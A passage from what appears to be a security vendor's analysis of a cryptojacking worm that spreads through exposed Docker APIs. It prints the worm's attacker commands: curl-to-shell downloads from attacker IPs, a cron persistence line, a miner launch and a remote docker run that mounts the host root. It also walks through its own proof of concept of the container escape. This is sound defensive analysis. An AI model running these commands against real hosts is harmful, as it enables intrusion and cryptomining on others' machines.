server. Hosting For hosting, the malware relies on other compromised hosts. For example, dockerupdate[.]anondns[.]net uses an obsolete version of SugarCRM , vulnerable to exploits. The attackers have compromised this server, installed a webshell b374k , and then uploaded several malicious files on it, starting from 11 July 2020. A server at 129[.]211[.]98[.]236 , where the worm hosts its own body, is a vulnerable Docker host. According to Shodan , this server currently hosts a malicious Docker container image system_docker , which is spun with the following parameters: ./nigix –tls-url gulf.moneroocean.stream:20128 -u [MONERO_WALLET] -p x –currency monero –httpd 8080 A history of the executed container images suggests this host has executed multiple malicious scripts under an instance of alpine container image: chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]116[.]62[.]203[.]85:12222/web/xxx.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]106[.]12[.]40[.]198:22222/test/yyy.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:12345/zzz.sh | sh’ chroot /mnt /bin/sh -c ‘iptables -F; chattr -ia /etc/resolv.conf; echo “nameserver 8.8.8.8” > /etc/resolv.conf; curl -m 5 http[://]139[.]9[.]77[.]204:26573/test/zzz.sh | sh’ Docker Lan Pwner A special module called docker lan pwner is responsible for propagating the infection across other Docker hosts. To understand the mechanism behind it, it’s important to remember that a non-protected Docker host effectively acts as a backdoor trojan. Configuring Docker daemon to listen for remote connections is easy. All it requires is one extra entry -H tcp://127.0.0.1:2375 in systemd unit file or daemon.json file. Once configured and restarted, the daemon will expose port 2375 for remote clients: $ sudo netstat -tulpn | grep dockerd tcp 0 0 127.0.0.1:2375 0.0.0.0:* LISTEN 16039/dockerd To attack other hosts, the malware collects network segments for all network interfaces with the help of ip route show command. For example, for an interface with an assigned IP 192.168.20.25 , the IP range of all available hosts on that network could be expressed in CIDR notation as 192.168.20.0/24 . For each collected network segment, it launches masscan tool to probe each IP address from the specified segment, on the following ports: Port Number Service Name Description 2375 docker Docker REST API (plain text) 2376 docker-s Docker REST API (ssl) 2377 swarm RPC interface for Docker Swarm 4243 docker Old Docker REST API (plain text) 4244 docker-basic-auth Authentication for old Docker REST API The scan rate is set to 50,000 packets/second. For example, running masscan tool over the CIDR block 192.168.20.0/24 on port 2375 , may produce an output similar to: $ masscan 192.168.20.0/24 -p2375 –rate=50000 Discovered open port 2375/tcp on 192.168.20.25 From the output above, the malware selects a word at the 6th position, which is the detected IP address. Next, the worm runs zgrab — a banner grabber utility — to send an HTTP request “/v1.16/version” to the selected endpoint. For example, sending such request to a local instance of a Docker daemon results in the following response: Next, it applies grep utility to parse the contents returned by the banner grabber zgrab , making sure the returned JSON file contains either “ApiVersion” or “client version 1.16” string in it. The latest version if Docker daemon will have “ApiVersion” in its banner. Finally, it will apply jq — a command-line JSON processor — to parse the JSON file, extract “ip” field from it, and return it as a string. With all the steps above combined, the worm simply returns a list of IP addresses for the hosts that run Docker daemon, located in the same network segments as the victim. For each returned IP address, it will attempt to connect to the Docker daemon listening on one of the enumerated ports, and instruct it to download and run the specified malicious script: docker -H tcp://[IP_ADDRESS]:[PORT] run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “curl [MALICIOUS_SCRIPT] | bash; …” The malicious script employed by the worm allows it to execute the code directly on the host, effectively escaping the boundaries imposed by the Docker containers. We’ll get down to this trick in a moment. For now, let’s break down the instructions passed to the Docker daemon. The worm instructs the remote daemon to execute a legitimate alpine image with the following parameters: –rm switch will cause Docker to automatically remove the container when it exits -v /:/mnt is a bind mount parameter that instructs Docker runtime to mount the host’s root directory / within the container as /mnt chroot /mnt will change the root directory for the current running process into /mnt , which corresponds to the root directory / of the host a malicious script to be downloaded and executed Escaping From the Docker Container The malicious script downloaded and executed within alpine container first checks if the user’s crontab — a special configuration file that specifies shell commands to run periodically on a given schedule — contains a string “129[.]211[.]98[.]236” : crontab -l | grep -e “129[.]211[.]98[.]236” | grep -v grep If it does not contain such string, the script will set up a new cron job with: echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * $LDR http[:]//129[.]211[.]98[.]236/xmr/mo/mo.jpg | bash; crontab -r > /dev/null 2>&1” ) | crontab – The code snippet above will suppress the no crontab for username message, and create a new scheduled task to be executed every minute . The scheduled task consists of 2 parts: to download and execute the malicious script and to delete all scheduled tasks from the crontab . This will effectively execute the scheduled task only once, with a one minute delay. After that, the container image quits. There are two important moments associated with this trick: as the Docker container’s root directory was mapped to the host’s root directory / , any task scheduled inside the container will be automatically scheduled in the host’s root crontab as Docker daemon runs as root, a remote non-root user that follows such steps will create a task that is scheduled in the root’s crontab , to be executed as root Building PoC To test this trick in action, let’s create a shell script that prints “123” into a file _123.txt located in the root directory / . echo “setup cron” ( crontab -l 2>/dev/null echo “* * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1” ) | crontab – Next, let’s pass this script encoded in base64 format to the Docker daemon running on the local host: docker -H tcp://127.0.0.1:2375 run –rm -v /:/mnt alpine chroot /mnt /bin/sh -c “echo ‘[OUR_BASE_64_ENCODED_SCRIPT]’ | base64 -d | bash” Upon execution of this command, the alpine image starts and quits. This can be confirmed with the empty list of running containers: $ docker -H tcp://127.0.0.1:2375 ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES An important question now is if the crontab job was created inside the (now destroyed) docker container or on the host? If we check the root’s crontab on the host, it will tell us that the task was scheduled for the host’s root, to be run on the host: $ sudo crontab -l * * * * echo 123>/_123.txt; crontab -r > /dev/null 2>&1 A minute later, the file _123.txt shows up in the host’s root directory, and the scheduled entry disappears from the root’s crontab on the host: $ sudo crontab -l no crontab for root This simple exercise proves that while the malware executes the malicious script inside the spawned container, insulated from the host, the actual task it schedules is created and then executed on the host. By using the cron job trick, the malware manipulates the Docker daemon to execute malware directly on the host! Malicious Script Upon escaping from container to be executed directly on a remote compromised host, the malicious script will perform the following actions: Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn’t fail, compliance did. Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

bottom of page